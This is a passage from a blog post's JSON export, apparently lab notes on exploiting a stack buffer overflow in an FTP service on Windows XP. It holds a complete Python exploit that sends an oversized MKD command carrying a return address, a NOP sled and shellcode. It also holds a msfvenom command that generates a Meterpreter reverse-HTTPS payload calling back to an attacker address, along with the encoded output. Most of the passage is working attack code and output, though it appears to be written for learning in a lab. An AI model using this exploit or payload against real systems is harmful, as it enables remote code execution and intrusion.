\/>\n&quot;\\x5b\\x52\\x45\\x13\\x29\\x7b\\x6a\\x94\\x84\\x5d\\x45\\x25\\x29\\x62\\x09&quot;<br \/>\n&quot;\\xe5\\x2b\\x1e\\x53\\x3a\\x8c\\x1f\\x9c\\x4f\\xcd\\x58\\xc0\\xa0\\x9f\\x31&quot;<br \/>\n&quot;\\x8f\\x13\\x30\\x35\\xcd\\xaf\\x31\\x99\\x5a\\x8f\\x49\\x9c\\x9c\\x64\\xe0&quot;<br \/>\n&quot;\\x9f\\xcc\\xd5\\x7f\\xd7\\xf4\\x5e\\x27\\xc8\\x05\\xb2\\x3b\\x34\\x4c\\xbf&quot;<br \/>\n&quot;\\x88\\xce\\x4f\\x69\\xc1\\x2f\\x7e\\x55\\x8e\\x11\\x4f\\x58\\xce\\x56\\x77&quot;<br \/>\n&quot;\\x83\\xa5\\xac\\x84\\x3e\\xbe\\x76\\xf7\\xe4\\x4b\\x6b\\x5f\\x6e\\xeb\\x4f&quot;<br \/>\n&quot;\\x5e\\xa3\\x6a\\x1b\\x6c\\x08\\xf8\\x43\\x70\\x8f\\x2d\\xf8\\x8c\\x04\\xd0&quot;<br \/>\n&quot;\\x2f\\x05\\x5e\\xf7\\xeb\\x4e\\x04\\x96\\xaa\\x2a\\xeb\\xa7\\xad\\x92\\x54&quot;<br \/>\n&quot;\\x02\\xa5\\x30\\x80\\x34\\xe4\\x5e\\x57\\xb4\\x92\\x27\\x57\\xc6\\x9c\\x07&quot;<br \/>\n&quot;\\x30\\xf7\\x17\\xc8\\x47\\x08\\xf2\\xad\\xb8\\x42\\x5f\\x87\\x50\\x0b\\x35&quot;<br \/>\n&quot;\\x9a\\x3c\\xac\\xe3\\xd8\\x38\\x2f\\x06\\xa0\\xbe\\x2f\\x63\\xa5\\xfb\\xf7&quot;<br \/>\n&quot;\\x9f\\xd7\\x94\\x9d\\x9f\\x44\\x94\\xb7\\xc3\\x0b\\x06\\x5b\\x2a\\xae\\xae&quot;<br \/>\n&quot;\\xfe\\x32&quot;)<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/><\/div><\/td><td><div class=\"text codecolorer\">buffer = &quot;\\x90&quot; * 30 + shellcode<br \/>\nevil = &quot;A&quot;*247 + &quot;\\x7D\\x16\\x9C\\x7C&quot; + buffer + &quot;C&quot;*(749-len(buffer))<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p><i>Note: before the shellcode we have inserted a NOP sled (the 30 \\x90 bytes). \\x90 is the x86 NOP instruction (No Operation): the CPU does nothing and moves on to the next byte, so if ESP lands anywhere inside the sled execution slides forward into the shellcode. That gives us some slack if ESP is a few bytes off from where we expect, and the sled is counted in the padding calculation so the whole string still totals 1000 bytes.<\/i><\/p>\n<p>This leaves us with the resultant exploit code:<\/p>\n<div class=\"codecolorer-container python vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br \/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/><\/div><\/td><td><div class=\"python codecolorer\"><span class=\"co1\">#!\/usr\/bin\/python<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">socket<\/span><br \/>\n<span class=\"kw1\">import<\/span> <span class=\"kw3\">sys<\/span><br \/>\n<span class=\"co1\">#evil = &quot;A&quot;*247 + &quot;B&quot;*4 + &quot;C&quot;*749<\/span><br \/>\n<span class=\"co1\">#evil = &quot;A&quot;*247 + 
&quot;\\x7D\\x16\\x9C\\x7C&quot; + &quot;C&quot;*749<\/span><br \/>\nshellcode <span class=\"sy0\">=<\/span> <span class=\"br0\">&#40;<\/span><span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>bf<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>19<span class=\"es0\">\\x<\/span>02<span class=\"es0\">\\x<\/span>91<span class=\"es0\">\\x<\/span>d9<span class=\"es0\">\\x<\/span>ea<span class=\"es0\">\\x<\/span>d9<span class=\"es0\">\\x<\/span>74<span class=\"es0\">\\x<\/span>24<span class=\"es0\">\\x<\/span>f4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>c9<span class=\"es0\">\\x<\/span>b1&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>33<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>12<span class=\"es0\">\\x<\/span>03<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>12<span class=\"es0\">\\x<\/span>83<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>1d<span class=\"es0\">\\x<\/span>e0<span class=\"es0\">\\x<\/span>64<span class=\"es0\">\\x<\/span>6f<span class=\"es0\">\\x<\/span>f6<span class=\"es0\">\\x<\/span>6d&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>86<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>07<span class=\"es0\">\\x<\/span>0e<span class=\"es0\">\\x<\/span>0e<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>36<span class=\"es0\">\\x<\/span>1c<span class=\"es0\">\\x<\/span>74<span class=\"es0\">\\x<\/span>ff<span class=\"es0\">\\x<\/span>6b<span class=\"es0\">\\x<\/span>90<span class=\"es0\">\\x<\/span>fe<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>87&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>5b<span class=\"es0\">\\x<\/span>52<span class=\"es0\">\\x<\/span>45<span class=\"es0\">\\x<\/span>13<span class=\"es0\">\\x<\/span>29<span 
class=\"es0\">\\x<\/span>7b<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>84<span class=\"es0\">\\x<\/span>5d<span class=\"es0\">\\x<\/span>45<span class=\"es0\">\\x<\/span>25<span class=\"es0\">\\x<\/span>29<span class=\"es0\">\\x<\/span>62<span class=\"es0\">\\x<\/span>09&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>e5<span class=\"es0\">\\x<\/span>2b<span class=\"es0\">\\x<\/span>1e<span class=\"es0\">\\x<\/span>53<span class=\"es0\">\\x<\/span>3a<span class=\"es0\">\\x<\/span>8c<span class=\"es0\">\\x<\/span>1f<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>58<span class=\"es0\">\\x<\/span>c0<span class=\"es0\">\\x<\/span>a0<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>31&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>13<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>35<span class=\"es0\">\\x<\/span>cd<span class=\"es0\">\\x<\/span>af<span class=\"es0\">\\x<\/span>31<span class=\"es0\">\\x<\/span>99<span class=\"es0\">\\x<\/span>5a<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>49<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>64<span class=\"es0\">\\x<\/span>e0&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>cc<span class=\"es0\">\\x<\/span>d5<span class=\"es0\">\\x<\/span>7f<span class=\"es0\">\\x<\/span>d7<span class=\"es0\">\\x<\/span>f4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>27<span class=\"es0\">\\x<\/span>c8<span class=\"es0\">\\x<\/span>05<span class=\"es0\">\\x<\/span>b2<span class=\"es0\">\\x<\/span>3b<span class=\"es0\">\\x<\/span>34<span class=\"es0\">\\x<\/span>4c<span class=\"es0\">\\x<\/span>bf&quot;<\/span><br \/>\n<span 
class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>88<span class=\"es0\">\\x<\/span>ce<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>69<span class=\"es0\">\\x<\/span>c1<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>7e<span class=\"es0\">\\x<\/span>55<span class=\"es0\">\\x<\/span>8e<span class=\"es0\">\\x<\/span>11<span class=\"es0\">\\x<\/span>4f<span class=\"es0\">\\x<\/span>58<span class=\"es0\">\\x<\/span>ce<span class=\"es0\">\\x<\/span>56<span class=\"es0\">\\x<\/span>77&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>83<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>ac<span class=\"es0\">\\x<\/span>84<span class=\"es0\">\\x<\/span>3e<span class=\"es0\">\\x<\/span>be<span class=\"es0\">\\x<\/span>76<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>e4<span class=\"es0\">\\x<\/span>4b<span class=\"es0\">\\x<\/span>6b<span class=\"es0\">\\x<\/span>5f<span class=\"es0\">\\x<\/span>6e<span class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>4f&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>a3<span class=\"es0\">\\x<\/span>6a<span class=\"es0\">\\x<\/span>1b<span class=\"es0\">\\x<\/span>6c<span class=\"es0\">\\x<\/span>08<span class=\"es0\">\\x<\/span>f8<span class=\"es0\">\\x<\/span>43<span class=\"es0\">\\x<\/span>70<span class=\"es0\">\\x<\/span>8f<span class=\"es0\">\\x<\/span>2d<span class=\"es0\">\\x<\/span>f8<span class=\"es0\">\\x<\/span>8c<span class=\"es0\">\\x<\/span>04<span class=\"es0\">\\x<\/span>d0&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>05<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>4e<span class=\"es0\">\\x<\/span>04<span class=\"es0\">\\x<\/span>96<span class=\"es0\">\\x<\/span>aa<span class=\"es0\">\\x<\/span>2a<span 
class=\"es0\">\\x<\/span>eb<span class=\"es0\">\\x<\/span>a7<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>92<span class=\"es0\">\\x<\/span>54&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>02<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>80<span class=\"es0\">\\x<\/span>34<span class=\"es0\">\\x<\/span>e4<span class=\"es0\">\\x<\/span>5e<span class=\"es0\">\\x<\/span>57<span class=\"es0\">\\x<\/span>b4<span class=\"es0\">\\x<\/span>92<span class=\"es0\">\\x<\/span>27<span class=\"es0\">\\x<\/span>57<span class=\"es0\">\\x<\/span>c6<span class=\"es0\">\\x<\/span>9c<span class=\"es0\">\\x<\/span>07&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>30<span class=\"es0\">\\x<\/span>f7<span class=\"es0\">\\x<\/span>17<span class=\"es0\">\\x<\/span>c8<span class=\"es0\">\\x<\/span>47<span class=\"es0\">\\x<\/span>08<span class=\"es0\">\\x<\/span>f2<span class=\"es0\">\\x<\/span>ad<span class=\"es0\">\\x<\/span>b8<span class=\"es0\">\\x<\/span>42<span class=\"es0\">\\x<\/span>5f<span class=\"es0\">\\x<\/span>87<span class=\"es0\">\\x<\/span>50<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>35&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9a<span class=\"es0\">\\x<\/span>3c<span class=\"es0\">\\x<\/span>ac<span class=\"es0\">\\x<\/span>e3<span class=\"es0\">\\x<\/span>d8<span class=\"es0\">\\x<\/span>38<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>06<span class=\"es0\">\\x<\/span>a0<span class=\"es0\">\\x<\/span>be<span class=\"es0\">\\x<\/span>2f<span class=\"es0\">\\x<\/span>63<span class=\"es0\">\\x<\/span>a5<span class=\"es0\">\\x<\/span>fb<span class=\"es0\">\\x<\/span>f7&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>d7<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>9d<span 
class=\"es0\">\\x<\/span>9f<span class=\"es0\">\\x<\/span>44<span class=\"es0\">\\x<\/span>94<span class=\"es0\">\\x<\/span>b7<span class=\"es0\">\\x<\/span>c3<span class=\"es0\">\\x<\/span>0b<span class=\"es0\">\\x<\/span>06<span class=\"es0\">\\x<\/span>5b<span class=\"es0\">\\x<\/span>2a<span class=\"es0\">\\x<\/span>ae<span class=\"es0\">\\x<\/span>ae&quot;<\/span><br \/>\n<span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>fe<span class=\"es0\">\\x<\/span>32&quot;<\/span><span class=\"br0\">&#41;<\/span><br \/>\nbuffer <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>90&quot;<\/span> * <span class=\"nu0\">30<\/span> + shellcode<br \/>\nevil <span class=\"sy0\">=<\/span> <span class=\"st0\">&quot;A&quot;<\/span>*<span class=\"nu0\">247<\/span> + <span class=\"st0\">&quot;<span class=\"es0\">\\x<\/span>7D<span class=\"es0\">\\x<\/span>16<span class=\"es0\">\\x<\/span>9C<span class=\"es0\">\\x<\/span>7C&quot;<\/span> + buffer + <span class=\"st0\">&quot;C&quot;<\/span>*<span class=\"br0\">&#40;<\/span><span class=\"nu0\">749<\/span>-<span class=\"kw2\">len<\/span><span class=\"br0\">&#40;<\/span>buffer<span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns<span class=\"sy0\">=<\/span><span class=\"kw3\">socket<\/span>.<span class=\"kw3\">socket<\/span><span class=\"br0\">&#40;<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">AF_INET<\/span><span class=\"sy0\">,<\/span><span class=\"kw3\">socket<\/span>.<span class=\"me1\">SOCK_STREAM<\/span><span class=\"br0\">&#41;<\/span><br \/>\nconnect<span class=\"sy0\">=<\/span>s.<span class=\"me1\">connect<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'192.168.0.71'<\/span><span class=\"sy0\">,<\/span><span class=\"nu0\">21<\/span><span class=\"br0\">&#41;<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'USER 
anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'PASS anonymous<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'MKD '<\/span> + evil + <span class=\"st0\">'<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">recv<\/span><span class=\"br0\">&#40;<\/span><span class=\"nu0\">1024<\/span><span class=\"br0\">&#41;<\/span><br \/>\ns.<span class=\"me1\">send<\/span><span class=\"br0\">&#40;<\/span><span class=\"st0\">'QUIT<span class=\"es0\">\\r<\/span><span class=\"es0\">\\n<\/span>'<\/span><span class=\"br0\">&#41;<\/span><span class=\"sy0\">;<\/span>s.<span class=\"me1\">close<\/span><span class=\"br0\">&#40;<\/span><span class=\"br0\">&#41;<\/span><\/div><\/td><\/tr><\/tbody><\/table><\/div>\n<p>And here&#8217;s a demo video:<br \/>\n<iframe loading=\"lazy\" width=\"500\" height=\"375\" src=\"http:\/\/www.youtube.com\/embed\/zOtBoqPYTVg?feature=oembed\" frameborder=\"0\" allowfullscreen><\/iframe><\/p>\n<p>In order to take things further you could create shellcode that makes a reverse HTTPS connection back to your attacking box:<\/p>\n<div class=\"codecolorer-container text vibrant\" style=\"overflow:auto;white-space:nowrap;width:100%;height:300px;\"><table cellspacing=\"0\" cellpadding=\"0\"><tbody><tr><td class=\"line-numbers\"><div>1<br \/>2<br \/>3<br \/>4<br \/>5<br \/>6<br \/>7<br \/>8<br \/>9<br \/>10<br \/>11<br 
\/>12<br \/>13<br \/>14<br \/>15<br \/>16<br \/>17<br \/>18<br \/>19<br \/>20<br \/>21<br \/>22<br \/>23<br \/>24<br \/>25<br \/>26<br \/>27<br \/>28<br \/>29<br \/>30<br \/><\/div><\/td><td><div class=\"text codecolorer\">msf3$ .\/msfvenom -p windows\/meterpreter\/reverse_https LHOST=192.168.0.4 lPORT=4444 -b '\\x00\\x0A\\x0D' -f c <br \/>\n[*] x86\/shikata_ga_nai succeeded with size 394 (iteration=1)<br \/>\nunsigned char buf[] = <br \/>\n&quot;\\xdb\\xc1\\xb8\\x46\\x2c\\xc4\\x97\\xd9\\x74\\x24\\xf4\\x5a\\x2b\\xc9\\xb1&quot;<br \/>\n&quot;\\x5c\\x31\\x42\\x1a\\x03\\x42\\x1a\\x83\\xea\\xfc\\xe2\\xb3\\xd0\\x2c\\x1e&quot;<br \/>\n&quot;\\x3b\\x29\\xad\\x41\\xb2\\xcc\\x9c\\x53\\xa0\\x85\\x8d\\x63\\xa3\\xc8\\x3d&quot;<br \/>\n&quot;\\x0f\\xe1\\xf8\\xb6\\x7d\\x2d\\x0e\\x7e\\xcb\\x0b\\x21\\x7f\\xfd\\x93\\xed&quot;<br \/>\n&quot;\\x43\\x9f\\x6f\\xec\\x97\\x7f\\x4e\\x3f\\xea\\x7e\\x97\\x22\\x05\\xd2\\x40&quot;<br \/>\n&quot;\\x28\\xb4\\xc3\\xe5\\x6c\\x05\\xe5\\x29\\xfb\\x35\\x9d\\x4c\\x3c\\xc1\\x17&quot;<br \/>\n&quot;\\x4f\\x6d\\x7a\\x23\\x07\\x95\\xf0\\x6b\\xb7\\xa4\\xd5\\x6f\\x8b\\xef\\x52&quot;<br \/>\n&quot;\\x5b\\x78\\xee\\xb2\\x95\\x81\\xc0\\xfa\\x7a\\xbc\\xec\\xf6\\x83\\xf9\\xcb&quot;<br \/>\n&quot;\\xe8\\xf1\\xf1\\x2f\\x94\\x01\\xc2\\x52\\x42\\x87\\xd6\\xf5\\x01\\x3f\\x32&quot;<br \/>\n&quot;\\x07\\xc5\\xa6\\xb1\\x0b\\xa2\\xad\\x9d\\x0f\\x35\\x61\\x96\\x34\\xbe\\x84&quot;<br \/>\n&quot;\\x78\\xbd\\x84\\xa2\\x5c\\xe5\\x5f\\xca\\xc5\\x43\\x31\\xf3\\x15\\x2b\\xee&quot;<br \/>\n&quot;\\x51\\x5e\\xde\\xfb\\xe0\\x3d\\xb7\\x95\\x89\\xc9\\x47\\x02\\x25\\x58\\x26&quot;<br \/>\n&quot;\\xbb\\x9d\\xf2\\xfa\\x4c\\x38\\x05\\xfc\\x66\\x75\\xf6\\x55\\xde\\x21\\x5f&quot;<br \/>\n&quot;\\x30\\xe0\\x99\\x37\\xfe\\xb6\\x58\\x60\\x01\\xe3\\x70\\x31\\xa5\\x3d\\x4e&quot;<br \/>\n&quot;\\x9c\\x08\\x54\\x53\\x4f\\xfa\\xc0\\x0f\\x7e\\xfc\\x10\\xe3\\xd0\\x94\\x47&quot;<br \/>\n&quot;\\x8a\\x4f\\xa2\\x97\\x59\\x84\\x63\\x31\\x53\\x88\\x26\\xa9\\x93\\x1e\\x67&quot;<br 
\/>\n&quot;\\xad\\xc6\\x0c\\x35\\xff\\xb4\\xe0\\xd1\\x14\\x6d\\x2e\\x19\\x14\\x5b\\xa7&quot;<br \/>\n&quot;\\x9b\\x80\\x74\\xec\\x4b\\xd5\\x46\\x12\\x8c\\x5c\\x48\\x78\\x88\\x0e\\xe3&quot;<br \/>\n&quot;\\x63\\xc6\\xc6\\x86\\xdd\\x78\\x90\\x96\\x34\\xb5\\x62\\x3f\\xe1\\xe1\\xcb&quot;<br \/>\n&quot;\\x96\\x65\\x23\\xf2\\x0e\\x0e\\xc4\\x2f\\xab\\x30\\x4f\\xca\\xff\\xc4\\xa0&quot;<br \/>\n&quot;\\x01\\x2a\\xcf\\x88\\x3d\\x66\\xf0\\xf4\\x41\\xa6\\x37\\x72\\xf8\\xdd\\x47&quot;<br \/>\n&quot;\\x84\\x6c\\xee\\xf2\\x26\\x3a\\xf1\\x29\\x4c\\x83\\x65\\xd1\\x81\\x03\\x76&quot;<br \/>\n&quot;\\xb9\\xa1\\x03\\x36\\x39\\xf5\\x6b\\xee\\x9d\\xaa\\x8e\\xf1\\x08\\xdf\\x02&quot;<br \/>\n&quot;\\x5d\\x3b\\x07\\xf3\\x09\\x3b\\xe8\\xfc\\xc9\\x68\\xbe\\x94\\xdb\\x18\\xb7&quot;<br \/>\n&quot;\\x87\\x23\\xf1\\x4d\\x87\\xa8\\x34\\xc6\\x0f\\x50\\x05\\x5c\\xcf\\x27\\x6c&quot;<br \/>\n&quot;\\x07\\x13\\x2f\\x3f\\x47\\x6c\\x4f\\x8e\\x8e\\xa1\\x9e\\xc1\\xc6\\xfd\\xf0&quot;<br \/>\n&quot;\\x11\\x09\\xca\\x0c&quot;;<\/div><\/td><\/tr><\/tbody><\/table><\/div>\n","protected":false},"excerpt":{"rendered":"<p>So I&#8217;ve for a while needed to learn how to exploit a service using things like NOP sleds and so on. I decided to follow this great tutorial here but wanted to make my own notes. 
First off you&#8217;ll need the following: Windows XP x86 SP3 machine Immunity Debugger mona.py &#8211; place inside PyCommands folder [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":821,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[319,320,321,316,317,318,322,323],"_links":{"self":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807"}],"collection":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/comments?post=807"}],"version-history":[{"count":7,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807\/revisions"}],"predecessor-version":[{"id":860,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/posts\/807\/revisions\/860"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media\/821"}],"wp:attachment":[{"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/media?parent=807"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/categories?post=807"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.phillips321.co.uk\/wp-json\/wp\/v2\/tags?post=807"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}